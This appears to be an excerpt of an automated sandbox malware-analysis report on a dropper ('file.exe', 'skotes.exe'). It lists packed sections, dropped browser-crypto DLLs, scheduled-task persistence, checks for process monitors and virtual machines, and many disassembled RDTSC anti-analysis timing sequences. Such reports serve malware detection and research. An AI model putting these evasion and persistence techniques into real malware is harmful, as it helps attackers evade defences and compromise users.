Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name: entropy: 7.980623682500333
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name: sxkyywio entropy: 7.95370667593572
Source: skotes.exe.25.dr	Static PE information: section name: entropy: 7.980623682500333
Source: skotes.exe.25.dr	Static PE information: section name: sxkyywio entropy: 7.95370667593572

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsJDAFHCGIJE.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsJDAFHCGIJE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1008361001\bca166439f.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsJDAFHCGIJE.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsJDAFHCGIJE.exe

Jump to dropped file

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\DocumentsJDAFHCGIJE.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118008B second address: 118008F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13003BE second address: 13003DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F400D373725h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13003DF second address: 13003EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13003EF second address: 13003FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F400D373716h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1300948 second address: 130097D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jnc 00007F400D181C06h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jo 00007F400D181C06h 0x0000001c jnl 00007F400D181C06h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1303FC2 second address: 1303FC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1303FC8 second address: 1303FF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jng 00007F400D181C0Bh 0x00000010 mov edx, 5E85E836h 0x00000015 push 00000000h 0x00000017 mov ecx, edi 0x00000019 push 5057B430h 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jo 00007F400D181C06h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1303FF8 second address: 130404B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 5057B4B0h 0x0000000e call 00007F400D37371Fh 0x00000013 jne 00007F400D37371Ch 0x00000019 pop esi 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D1977h], ebx 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D18F7h], ecx 0x0000002a push 00000003h 0x0000002c call 00007F400D373719h 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 push esi 0x00000036 pop esi 0x00000037 popad 0x00000038 pop edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e pop edi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 130404B second address: 130406A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F400D181C12h 0x00000013 jmp 00007F400D181C0Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 130406A second address: 1304086 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F400D373718h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jc 00007F400D373722h 0x00000014 je 00007F400D37371Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13041F4 second address: 1304213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F400D181C17h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1304213 second address: 130421D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F400D373716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 130421D second address: 130424F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 jmp 00007F400D181C16h 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 130424F second address: 1304253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1304253 second address: 1304259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1304259 second address: 130425E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 130425E second address: 1304297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ebx 0x0000000c jmp 00007F400D181C0Bh 0x00000011 pop ebx 0x00000012 pop eax 0x00000013 mov esi, dword ptr [ebp+122D18B7h] 0x00000019 push 00000003h 0x0000001b movzx esi, di 0x0000001e push 00000000h 0x00000020 mov di, 63F7h 0x00000024 push 00000003h 0x00000026 mov si, di 0x00000029 push CD5A3C57h 0x0000002e push eax 0x0000002f push edx 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1304297 second address: 130429C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 130429C second address: 1304315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 0D5A3C57h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F400D181C08h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a xor dword ptr [ebp+122D1B35h], eax 0x00000030 lea ebx, dword ptr [ebp+12457E47h] 0x00000036 xor dword ptr [ebp+122D18D3h], edi 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e push eax 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 pop eax 0x00000042 push ecx 0x00000043 jmp 00007F400D181C0Bh 0x00000048 pop ecx 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F400D181C18h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1304315 second address: 1304319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1304319 second address: 1304330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F400D181C0Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131657D second address: 1316581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1316581 second address: 1316587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1316587 second address: 1316591 instructions: 0x00000000 rdtsc 0x00000002 js 00007F400D37371Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324A22 second address: 1324A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F400D181C06h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F400D181C0Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324A40 second address: 1324A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324A44 second address: 1324A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324A48 second address: 1324A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324A50 second address: 1324A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324A57 second address: 1324A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F400D373723h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324A75 second address: 1324A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1322C7B second address: 1322CA2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F400D373718h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F400D373737h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F400D373721h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1322F63 second address: 1322F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1322F67 second address: 1322F87 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F400D373727h 0x0000000c jmp 00007F400D37371Fh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1322F87 second address: 1322F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1322F8D second address: 1322F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F400D373716h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1322F9C second address: 1322FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132353D second address: 1323549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F400D373716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1323549 second address: 132354D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132354D second address: 132359A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F400D373726h 0x00000012 push ebx 0x00000013 jmp 00007F400D373724h 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132359A second address: 13235A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F400D181C0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132372F second address: 1323733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13241AB second address: 13241C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D181C16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1324303 second address: 132431B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jg 00007F400D373716h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F400D373716h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132431B second address: 132431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132446E second address: 13244AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F400D373724h 0x0000000c jmp 00007F400D373727h 0x00000011 popad 0x00000012 jnp 00007F400D373720h 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13245D9 second address: 13245F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F400D181C06h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F400D181C06h 0x00000013 jo 00007F400D181C06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13248AE second address: 13248DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Fh 0x00000007 jmp 00007F400D373724h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F38F2 second address: 12F3908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007F400D181C06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007F400D181C06h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3908 second address: 12F393E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373727h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F400D373725h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1330942 second address: 1330946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1330DE4 second address: 1330DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1332EB9 second address: 1332EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1332FE4 second address: 1332FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1332FEA second address: 1332FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F400D181C06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13335C3 second address: 13335CD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F400D37371Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1333ADF second address: 1333B02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1333B02 second address: 1333B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1333B06 second address: 1333B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F400D181C08h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 js 00007F400D181C08h 0x00000028 mov edi, esi 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F400D181C18h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1333B51 second address: 1333B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1333B64 second address: 1333B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1333B6A second address: 1333B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1333D19 second address: 1333D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
